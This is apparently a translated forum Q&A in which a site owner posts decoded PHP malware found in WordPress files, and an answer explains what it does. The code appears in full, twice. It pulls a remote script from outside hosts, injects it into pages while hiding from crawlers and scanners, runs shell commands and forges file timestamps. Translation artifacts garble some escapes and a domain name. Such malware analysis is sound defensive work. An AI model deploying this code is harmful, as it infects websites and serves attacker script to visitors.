我在客户端网站上的许多PHP文件中发现了这段代码。当然,原件已经被混淆和编码了。我已经设法将其解码并格式化为当前形式。
我的问题是:它到底完成了什么?代码是否表明了它是如何注入的,从而揭示了未来如何预防这种情况?
<?php
if(!function_exists('check_wp_head_load')){
function check_wp_head_load(){
if(!function_exists('cc')){
function cc($ll_0){
$ll_1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
if(function_exists('curl_init')){
$ll_2 = curl_init();
curl_setopt($ll_2, 10002, $ll_0);
curl_setopt($ll_2, 42, 0);
curl_setopt($ll_2, 13, 30);
curl_setopt($ll_2, 19913, 1);
curl_setopt($ll_2, 10018, $ll_1);
if(!(@ini_get("safe_mode") || @ini_get("open_basedir"))){
@curl_setopt($ll_2, 52, 1);
}
@curl_setopt($ll_2, 68, 2);
$ll_3 = curl_exec($ll_2);
curl_close($ll_2);
if($ll_3 !== false){
return $ll_3;
}
}
else if(function_exists('fsockopen')){
global $ll_4;
$ll_0 = str_replace("http://", "", $ll_0);
if(preg_match("#/#", "$ll_0")){
$ll_5 = $ll_0;
$ll_0 = @explode("/", $ll_0);
$ll_0 = $ll_0[0];
$ll_5 = str_replace($ll_0, "", $ll_5);
if(!$ll_5 || $ll_5 == ""){
$ll_5 = "/";
}
$ll_6 = gethostbyname($ll_0);
}
else{
$ll_6 = gethostbyname($ll_0);
$ll_5 = "/";
}
$ll_7 = fsockopen($ll_6, 80, $ll_8, $ll_9, 10);
stream_set_timeout($ll_7, 10);
if($ll_7){
$ll_10 = "GET $ll_5 HTTP/1.0'r'n";
$ll_10 .= "Host: $ll_0'r'n";
$ll_10 .= "Referer: http://$ll_0$ll_5'r'n";
$ll_10 .= "Accept-Language: en-us, en;q=0.50'r'n";
$ll_10 .= "User-Agent: $ll_1'r'n";
$ll_10 .= "Connection: Close'r'n'r'n";
fputs($ll_7, $ll_10);
while(!feof($ll_7)){
$ll_11 .= fgets($ll_7, 4096);
}
fclose($ll_7);
$ll_11 = @explode("'r'n'r'n", $ll_11, 2);
$ll_12 = $ll_11[0];
if($ll_4){
$ll_12 = "$ll_4<br /><br />'n$ll_12";
}
$ll_12 = str_replace("'n", "<br />", $ll_12);
if($ll_11[1]){
$ll_13 = $ll_11[1];
}
else{
$ll_13 = "";
}
if($ll_13){
$ll_11 = $ll_13;
}
else{
$ll_11 = $ll_12;
}
if(preg_match("/Location':/", "$ll_12")){
$ll_0 = @explode("Location: ", $ll_12);
$ll_0 = $ll_0[1];
$ll_0 = @explode("'r", $ll_0);
$ll_0 = $ll_0[0];
$ll_4 = str_replace("'r'n'r'n", "", $ll_12);
$ll_14 = "Location:";
$ll_4 = str_replace("Location:", $ll_14, $ll_4);
return cc($ll_0);
}
else{
return $ll_11;
}
}
}
else{
echo "ERROR";
exit;
}
}
}
if(!function_exists('detB')){
function detB($ll_15, $ll_16){
$ll_17 = array("66'.249'.[6-9][0-9]'.[0-9]+", "72'.14'.[1-2][0-9][0-9]'.[0-9]+", "74'.125'.[0-9]+'.[0-9]+", "65'.5[2-5]'.[0-9]+'.[0-9]+", "74'.6'.[0-9]+'.[0-9]+", "67'.195'.[0-9]+'.[0-9]+",
"72'.30'.[0-9]+'.[0-9]+", "38'.[0-9]+'.[0-9]+'.[0-9]+", "124'.115'.6'.[0-9]+", "93'.172'.94'.227", "212'.100'.250'.218", "71'.165'.223'.134",
"209'.9'.239'.101", "67'.217'.160'.[0-9]+", "70'.91'.180'.25", "65'.93'.62'.242", "74'.193'.246'.129", "213'.144'.15'.38",
"195'.92'.229'.2", "70'.50'.189'.191", "218'.28'.88'.99", "165'.160'.2'.20", "89'.122'.224'.230", "66'.230'.175'.124",
"218'.18'.174'.27", "65'.33'.87'.94", "67'.210'.111'.241", "81'.135'.175'.70", "64'.69'.34'.134", "89'.149'.253'.169",
"64'.233'.1[6-8][1-9]'.[0-9]+", "64'.233'.19[0-1]'.[0-9]+", "209'.185'.108'.[0-9]+", "209'.185'.253'.[0-9]+", "209'.85'.238'.[0-9]+", "216'.239'.33'.9[6-9]",
"216'.239'.37'.9[8-9]","216'.239'.39'.9[8-9]","216'.239'.41'.9[6-9]","216'.239'.45'.4","216'.239'.46'.[0-9]+","216'.239'.51'.9[6-9]","216'.239'.53'.9[8-9]",
"216'.239'.57'.9[6-9]","216'.239'.59'.9[8-9]","216'.33'.229'.163","64'.233'.173'.[0-9]+","64'.68'.8[0-9]'.[0-9]+","64'.68'.9[0-2]'.[0-9]+","72'.14'.199'.[0-9]+",
"8'.6'.48'.[0-9]+","207'.211'.40'.82","67'.162'.158'.146","66'.255'.53'.123","24'.200'.208'.112","129'.187'.148'.240","129'.187'.148'.244",
"199'.126'.151'.229","118'.124'.32'.193","89'.149'.217'.191","122'.164'.27'.42","149'.5'.168'.2","150'.70'.66'.[0-9]+","194'.250'.116'.39",
"208'.80'.194'.[0-9]+","62'.190'.39'.205","67'.198'.80'.236","85'.85'.187'.243","95'.134'.141'.250","97'.107'.135'.[0-9]+","97'.79'.239'.[0-9]+",
"184'.168'.191'.[0-9]+","95'.108'.157'.[0-9]+","209'.235'.253'.17");
$ll_18 = array("http","google","slurp","msnbot","bot","crawl",
"spider","robot","httpclient","curl","php","indy library",
"wordpress","charlotte","wwwster","python","urllib","perl",
"libwww","lynx","twiceler","rambler","yandex","trend",
"virus","malware","wget");
$ll_15 = preg_replace("|User'.Agent':['s ]?|i", "", $ll_15);
$ll_19 = true;
foreach($ll_17 as $ll_20)
if(eregi("$ll_20", $ll_16)){
$ll_19 = false;
break;
}
if($ll_19)
foreach($ll_18 as $ll_21)
if(eregi($ll_21, $ll_15) !== false){
$ll_19 = false;
break;
}
if($ll_19 and!eregi("^[a-zA-Z]{5,}", $ll_15)){
$ll_19 = false;
}
if($ll_19 and strlen($ll_15) <= 11){
$ll_19 = false;
}
return $ll_19;
}
}
if(!function_exists('rm_rf_file')){
function rm_rf_file($ll_22){
$ll_23 = filemtime($ll_22);
if($ll_24 = opendir($ll_22)){
while(false !==($ll_25 = readdir($ll_24))){
if($ll_25 != "." && $ll_25 != ".." && is_file($ll_25)){
chmod($ll_25, 438);
unlink($ll_25);
}
}
closedir($ll_24);
}
touch($ll_22, $ll_23, $ll_23);
}
}
if(!function_exists('sys_get_temp_dir')){
function sys_get_temp_dir(){
if($ll_26 = getenv("TMP"))
return $ll_26;
if($ll_26 = getenv("TEMP"))
return $ll_26;
if($ll_26 = getenv("TMPDIR"))
return $ll_26;
$ll_26 = tempnam(__FILE__, "");
if(file_exists($ll_26)){
unlink($ll_26);
return dirname($ll_26);
}
return false;
}
}
if(!function_exists('ex')){
function ex($ll_27){
$ll_28 = "";
if(!empty($ll_27)){
if(function_exists('exec')){
@exec($ll_27, $ll_28);
$ll_28 = join("'n", $ll_28);
}
elseif(function_exists('shell_exec')){
$ll_28 = @shell_exec($ll_27);
}
elseif(function_exists('system')){
@ob_start();
@system($ll_27);
$ll_28 = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($ll_27);
$ll_28 = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($ll_29 = @popen($ll_27, "r"))){
$ll_28 = "";
while(!@feof($ll_29)){
$ll_28 .= @fread($ll_29, 1024);
}
@pclose($ll_29);
}elseif(@function_exists('proc_open') && @is_resource($ll_29 = @proc_open($ll_27, array(1 => array("pipe", "w")), $ll_30))){
$ll_28 = "";
if(@function_exists('fread') && @function_exists('feof')){
while(!@feof($ll_30[1])){
$ll_28 .= @fread($ll_30[1], 1024);
}
}
else if(@function_exists('fgets') && @function_exists('feof')){
while(!@feof($ll_30[1])){
$ll_28 .= @fgets($ll_30[1], 1024);
}
}
@proc_close($ll_29);
}
}
return htmlspecialchars($ll_28);
}
}
$ll_31 = "lonly";
$ll_32 = $_SERVER["REMOTE_ADDR"];
$ll_1 = $_SERVER["HTTP_USER_AGENT"];
$ll_33 = $_SERVER["SCRIPT_FILENAME"];
$ll_34 = strtolower($ll_1);
if($ll_32 == "" || $ll_1 == "" || $ll_33 == "")
return null;
if(!isset($_COOKIE[$ll_31])){
$ll_35 = @sys_get_temp_dir();
if(!$ll_35){
$ll_35 = dirname($ll_33);
$ll_36 = $ll_35 ."/.tmp";
}
else{
$ll_36 = $ll_35 ."/.tmp";
if(!@file_exists($ll_36)){
$ll_23 = @filemtime($ll_35);
@mkdir($ll_36);
$ll_37 = @fopen("$ll_36/r", "w");
@fwrite($ll_37, "");
@fclose($ll_37);
@chmod($ll_36, 511);
@touch("$ll_36/r", $ll_23, $ll_23);
@touch($ll_35, $ll_23, $ll_23);
@touch($ll_36, $ll_23, $ll_23);
if(!@file_exists("$ll_36/r")){
$ll_35 = dirname($ll_33);
$ll_36 = $ll_35 ."/.cache";
}
}
}
if(!@file_exists($ll_36)){
$ll_23 = @filemtime($ll_35);
@mkdir($ll_36);
@chmod($ll_36, 511);
@touch($ll_35, $ll_23, $ll_23);
@touch($ll_36, $ll_23, $ll_23);
}
$ll_38 = @date("Hi");
$ll_39 = @date("ymd");
$ll_40 = "$ll_36/$ll_39";
$ll_41 = "$ll_36/tmp_$ll_39";
$ll_42 = $ll_39 - 1;
if(@file_exists("$ll_36/tmp_$ll_42") || ($ll_38 >= "0000" &&
$ll_38 <= "0001") || ($ll_38 >= "1200" &&
$ll_38 <= "1201") || ($ll_38 >= "1800" &&
$ll_38 <= "1801")){
@rm_rf_file($ll_36);
@ex("rm -rf $ll_36/*");
}
if(!@file_exists($ll_40)){
$ll_23 = @filemtime($ll_36);
$ll_37 = @fopen($ll_40, "w");
@fclose($ll_37);
@chmod($ll_40, 511);
@touch($ll_36, $ll_23, $ll_23);
}
if(@is_writable($ll_36) && (!@file_exists($ll_41) || @filesize($ll_41) < 5)){
$ll_43 = array("ohix.", "effbot.", "/f/", "net");
$ll_44 = $ll_43[rand(0, 1)] .$ll_43[3] .$ll_43[2];
$ll_45 = @cc($ll_44);
if($ll_45 != "ERROR" && base64_decode($ll_45) !== false){
$ll_23 = @filemtime($ll_36);
$ll_37 = @fopen($ll_41, "w");
@fwrite($ll_37, "$ll_45");
@fclose($ll_37);
@chmod($ll_41, 511);
@touch($ll_36, $ll_23, $ll_23);
@touch($ll_41, $ll_23, $ll_23);
}
else
return null;
}
$ll_46 = @base64_decode(@file_get_contents($ll_41));
$ll_47 = @file($ll_40);
$ll_48 = false;
foreach($ll_47 as $ll_49){
if(@trim($ll_49) == $ll_32){
$ll_48 = true;
break;
}
}
$ll_19 = @detB($ll_1,$ll_32);
if($ll_48 == false && $ll_19 == true){
$ll_37 = @fopen($ll_40,"a");
@fwrite($ll_37, "$ll_32'n");
@fclose($ll_37);
echo "'n" .str_repeat(" ", mt_rand(300, 1000))
. "<script type='text/javascript'>$ll_46</script>'n";
}
}
}
}
$ll_31 = "lonly";
if(!isset($_COOKIE[$ll_31]))
@add_action("wp_head", "check_wp_head_load", mt_rand(1, 7));
?>
好的,首先分析所有定义的函数,最后分析脚本实际做了什么。脚本定义了以下函数:
加载任何URL内容,它有两个实现(一个用于curl,另一个用于socket):
function cc($url) {
$user_agent = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
if (!(@ini_get("safe_mode") || @ini_get("open_basedir"))) {
@curl_setopt($ch, CURLE_GOT_NOTHING, 1);
}
@curl_setopt($ch, CURLOPT_MAXREDIRS, 2);
$content = curl_exec($ch);
curl_close($ch);
if ($content !== false) {
return $content;
}
} else if (function_exists('fsockopen')) {
// Alternative implementation
} else {
echo "ERROR";
exit;
}
}
某种RemoteAddr/用户代理验证(何时隐藏):
function detB($userAgent, $remoteAddr) {
// Those are obviously regexps which will match quite wide range of ip addresses
$ipList = array("66'.249'.[6-9][0-9]'.[0-9]+", "72'.14'.[1-2][0-9][0-9]'.[0-9]+", "74'.125'.[0-9]+'.[0-9]+", "65'.5[2-5]'.[0-9]+'.[0-9]+", "74'.6'.[0-9]+'.[0-9]+", "67'.195'.[0-9]+'.[0-9]+",
"72'.30'.[0-9]+'.[0-9]+", "38'.[0-9]+'.[0-9]+'.[0-9]+", "124'.115'.6'.[0-9]+", "93'.172'.94'.227", "212'.100'.250'.218", "71'.165'.223'.134",
"209'.9'.239'.101", "67'.217'.160'.[0-9]+", "70'.91'.180'.25", "65'.93'.62'.242", "74'.193'.246'.129", "213'.144'.15'.38",
"195'.92'.229'.2", "70'.50'.189'.191", "218'.28'.88'.99", "165'.160'.2'.20", "89'.122'.224'.230", "66'.230'.175'.124",
"218'.18'.174'.27", "65'.33'.87'.94", "67'.210'.111'.241", "81'.135'.175'.70", "64'.69'.34'.134", "89'.149'.253'.169",
"64'.233'.1[6-8][1-9]'.[0-9]+", "64'.233'.19[0-1]'.[0-9]+", "209'.185'.108'.[0-9]+", "209'.185'.253'.[0-9]+", "209'.85'.238'.[0-9]+", "216'.239'.33'.9[6-9]",
"216'.239'.37'.9[8-9]", "216'.239'.39'.9[8-9]", "216'.239'.41'.9[6-9]", "216'.239'.45'.4", "216'.239'.46'.[0-9]+", "216'.239'.51'.9[6-9]", "216'.239'.53'.9[8-9]",
"216'.239'.57'.9[6-9]", "216'.239'.59'.9[8-9]", "216'.33'.229'.163", "64'.233'.173'.[0-9]+", "64'.68'.8[0-9]'.[0-9]+", "64'.68'.9[0-2]'.[0-9]+", "72'.14'.199'.[0-9]+",
"8'.6'.48'.[0-9]+", "207'.211'.40'.82", "67'.162'.158'.146", "66'.255'.53'.123", "24'.200'.208'.112", "129'.187'.148'.240", "129'.187'.148'.244",
"199'.126'.151'.229", "118'.124'.32'.193", "89'.149'.217'.191", "122'.164'.27'.42", "149'.5'.168'.2", "150'.70'.66'.[0-9]+", "194'.250'.116'.39",
"208'.80'.194'.[0-9]+", "62'.190'.39'.205", "67'.198'.80'.236", "85'.85'.187'.243", "95'.134'.141'.250", "97'.107'.135'.[0-9]+", "97'.79'.239'.[0-9]+",
"184'.168'.191'.[0-9]+", "95'.108'.157'.[0-9]+", "209'.235'.253'.17");
// Those are magic words to be matched
$wordsList = array("http", "google", "slurp", "msnbot", "bot", "crawl",
"spider", "robot", "httpclient", "curl", "php", "indy library",
"wordpress", "charlotte", "wwwster", "python", "urllib", "perl",
"libwww", "lynx", "twiceler", "rambler", "yandex", "trend",
"virus", "malware", "wget");
$userAgent = preg_replace("|User'.Agent':['s ]?|i", "", $userAgent);
$replacedHeader = true;
foreach ($ipList as $ip)
if (eregi("$ip", $remoteAddr)) {
$replacedHeader = false;
break;
}
if ($replacedHeader)
foreach ($wordsList as $word)
if (eregi($word, $userAgent) !== false) {
$replacedHeader = false;
break;
}
if ($replacedHeader and !eregi("^[a-zA-Z]{5,}", $userAgent)) {
$replacedHeader = false;
}
if ($replacedHeader and strlen($userAgent) <= 11) {
$replacedHeader = false;
}
return $replacedHeader;
}
递归地删除文件/目录,并用自己的新文件替换它(这样mtime将匹配)
function rm_rf_file($filename) {
$fileMTime = filemtime($filename);
if ($directory = opendir($filename)) {
while (false !== ($directoryItem = readdir($directory))) {
if ($directoryItem != "." && $directoryItem != ".." && is_file($directoryItem)) {
chmod($directoryItem, 438); // 438 = 0666
unlink($directoryItem);
}
}
closedir($directory);
}
touch($filename, $fileMTime, $fileMTime);
}
获取system/php临时目录(几种方法):
function sys_get_temp_dir() {
if ($tmpDir = getenv("TMP"))
return $tmpDir;
if ($tmpDir = getenv("TEMP"))
return $tmpDir;
if ($tmpDir = getenv("TMPDIR"))
return $tmpDir;
// Now it's tmp file, not tmp dir
$tmpDir = tempnam(__FILE__, "");
if (file_exists($tmpDir)) {
unlink($tmpDir);
return dirname($tmpDir);
}
return false;
}
执行shell命令(php支持的所有可能执行的实现):
function ex($shellCommand) {
$result = "";
if (!empty($shellCommand)) {
if (function_exists('exec')) {
@exec($shellCommand, $result);
$result = join("'n", $result);
} elseif (function_exists('shell_exec')) {
$result = @shell_exec($shellCommand);
} elseif (function_exists('system')) {
@ob_start();
@system($shellCommand);
$result = @ob_get_contents();
@ob_end_clean();
} elseif (function_exists('passthru')) {
@ob_start();
@passthru($shellCommand);
$result = @ob_get_contents();
@ob_end_clean();
} elseif (@is_resource($processHandler = @popen($shellCommand, "r"))) {
$result = "";
while (!@feof($processHandler)) {
$result .= @fread($processHandler, 1024);
}
@pclose($processHandler);
} elseif (@function_exists('proc_open') && @is_resource($processHandler = @proc_open($shellCommand, array(1 => array("pipe", "w")), $shellOutput))) {
$result = "";
if (@function_exists('fread') && @function_exists('feof')) {
while (!@feof($shellOutput[1])) {
$result .= @fread($shellOutput[1], 1024);
}
} else if (@function_exists('fgets') && @function_exists('feof')) {
while (!@feof($shellOutput[1])) {
$result .= @fgets($shellOutput[1], 1024);
}
}
@proc_close($processHandler);
}
}
return htmlspecialchars($result);
}
主要有效载荷功能:
// This is just initialization for script variables
$cookieKey = "lonly";
$remoteAddr = $_SERVER["REMOTE_ADDR"];
$userAgent = $_SERVER["HTTP_USER_AGENT"];
$scriptFileName = $_SERVER["SCRIPT_FILENAME"];
$userAgentToLower = strtolower($userAgent);
// Requires to have all variables filled
if ($remoteAddr == "" || $userAgent == "" || $scriptFileName == "")
return null;
// Initialization via cookies
if (!isset($_COOKIE[$cookieKey])) {
$tempDir = @sys_get_temp_dir();
// If there's no tmp dir create directory in current directory
if (!$tempDir) {
$tempDir = dirname($scriptFileName);
$tempDirectory = $tempDir . "/.tmp";
// Create directory in temporary directory and hide directory mtime
} else {
$tempDirectory = $tempDir . "/.tmp";
if (!@file_exists($tempDirectory)) {
$directoryMTime = @filemtime($tempDir);
@mkdir($tempDirectory);
$tempFileFP = @fopen("$tempDirectory/r", "w");
@fwrite($tempFileFP, "");
@fclose($tempFileFP);
@chmod($tempDirectory, 511); // 0777
@touch("$tempDirectory/r", $directoryMTime, $directoryMTime);
@touch($tempDir, $directoryMTime, $directoryMTime);
@touch($tempDirectory, $directoryMTime, $directoryMTime);
if (!@file_exists("$tempDirectory/r")) {
$tempDir = dirname($scriptFileName);
$tempDirectory = $tempDir . "/.cache";
}
}
}
// Make sure that directory exists
if (!@file_exists($tempDirectory)) {
$directoryMTime = @filemtime($tempDir);
@mkdir($tempDirectory);
@chmod($tempDirectory, 511); // 0777
@touch($tempDir, $directoryMTime, $directoryMTime);
@touch($tempDirectory, $directoryMTime, $directoryMTime);
}
// Initializes variables
$time = @date("Hi");
$date = @date("ymd");
$ipStorageFile = "$tempDirectory/$date";
$payloadFile = "$tempDirectory/tmp_$date";
$date2 = $date - 1;
// Remove our own mass if there's file one day old,
// or when we launch script at certain times (0000, 1200 and 1800)
if (@file_exists("$tempDirectory/tmp_$date2") || ($time >= "0000" &&
$time <= "0001") || ($time >= "1200" &&
$time <= "1201") || ($time >= "1800" &&
$time <= "1801")) {
@rm_rf_file($tempDirectory);
@ex("rm -rf $tempDirectory/*");
}
// Create one temporary file
if (!@file_exists($ipStorageFile)) {
$directoryMTime = @filemtime($tempDirectory);
$tempFileFP = @fopen($ipStorageFile, "w");
@fclose($tempFileFP);
@chmod($ipStorageFile, 511); // 0777
@touch($tempDirectory, $directoryMTime, $directoryMTime);
}
// If file2 doesn't exists or is empty try to load content from website
// Websites is one of those:
// ohix.net/f/
// effbot.net/f/
if (@is_writable($tempDirectory) && (!@file_exists($payloadFile) || @filesize($payloadFile) < 5)) {
$urlParts = array("ohix.", "effbot.", "/f/", "net");
$url = $urlParts[rand(0, 1)] . $urlParts[3] . $urlParts[2];
$content = @cc($url);
if ($content != "ERROR" && base64_decode($content) !== false) {
$directoryMTime = @filemtime($tempDirectory);
$tempFileFP = @fopen($payloadFile, "w");
@fwrite($tempFileFP, "$content");
@fclose($tempFileFP);
@chmod($payloadFile, 511);
@touch($tempDirectory, $directoryMTime, $directoryMTime);
@touch($payloadFile, $directoryMTime, $directoryMTime);
}
else
return null;
}
// Load contents
$content = @base64_decode(@file_get_contents($payloadFile));
$ipList = @file($ipStorageFile);
$knowenIp = false;
// Check whether this IP was already used
foreach ($ipList as $ip) {
if (@trim($ip) == $remoteAddr) {
$knowenIp = true;
break;
}
}
$clientValidation = @detB($userAgent, $remoteAddr);
if ($knowenIp == false && $clientValidation == true) {
$tempFileFP = @fopen($ipStorageFile, "a");
@fwrite($tempFileFP, "$remoteAddr'n");
@fclose($tempFileFP);
echo "'n" . str_repeat(" ", mt_rand(300, 1000))
. "<script type='text/javascript'>$content</script>'n";
}
}
因此,如果我正确阅读了所有这些代码,脚本会执行以下操作:
- 尝试初始化几个函数(每个函数单独解释)
- 创建临时目录而不修改父文件夹的
mtime - 从其中一个站点将"有效载荷"加载到
$payloadFile(可能是广告内容)中:ohix.net/f/effbot.net/f/
- 每天只向每个用户/ip显示一次内容(
$ipStorageFile) - 脚本足够智能(函数
detB),不会向某些IP(可能是一些机器人程序、安全检查等)和一些用户代理(例如谷歌机器人程序或默认情况下无法启动javascript的客户端)显示其内容
经过一些重构和阅读,我得出结论,该脚本最终会导致服务器浏览以下网站之一:
- 俄亥俄州网络/f/
- effbot.net/f/
以及从这些网站下载和执行文件。
要么是你的密码很弱(或者以其他方式可以猜测),要么可能是wordpress中的安全漏洞。确保您拥有最新的版本。